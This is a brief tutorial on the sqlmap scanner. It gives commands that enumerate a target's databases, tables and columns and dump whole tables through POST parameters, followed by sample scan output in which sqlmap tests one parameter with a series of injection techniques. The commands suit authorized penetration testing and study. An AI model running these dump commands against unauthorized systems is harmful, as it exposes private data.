SQLMap is one of the best and most known tools to scan a webpage for SQL Injection vulnerabilities. It is very complete, and you can be 99% sure if there is a SQL vulnerability, this automated tool will find it.


Usage is pretty straight forward. Even though this tool can get very complex, I will explain the normal usage of it.

Fetching database names
sqlmap -u --method POST --data "password=pass&username=test" --dbs
Fetching table names knowing database name
sqlmap -u --method POST --data "password=pass&username=test" --tables -D myDatabase
Describing a table knowing its name
sqlmap -u --method POST --data "password=pass&username=test" --columns -D myDatabase -T myTable
Dumping whole table
sqlmap -u --method POST --data "password=pass&username=test" --dump -D myDatabase -T myTable


Example output
 ___ ___[(]_____ ___ ___  {1.5.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:28:29 /2021-12-21/

[18:28:29] [INFO] testing connection to the target URL
[18:28:29] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=9BA8C8CF8D6...80A16C352B'). Do you want to use those [Y/n] y
[18:28:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:28:34] [INFO] testing if the target URL content is stable
[18:28:34] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[18:28:35] [INFO] searching for dynamic content
[18:28:35] [INFO] dynamic content marked for removal (1 region)
[18:28:35] [INFO] testing if POST parameter 'password' is dynamic
[18:28:35] [WARNING] POST parameter 'password' does not appear to be dynamic
[18:28:35] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[18:28:35] [INFO] testing for SQL injection on POST parameter 'password'
[18:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:28:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:28:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:28:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:28:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:28:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:28:35] [INFO] testing 'Generic inline queries'
[18:28:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:28:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:28:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:28:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:28:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:28:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[18:28:35] [INFO] testing 'Oracle AND time-based blind'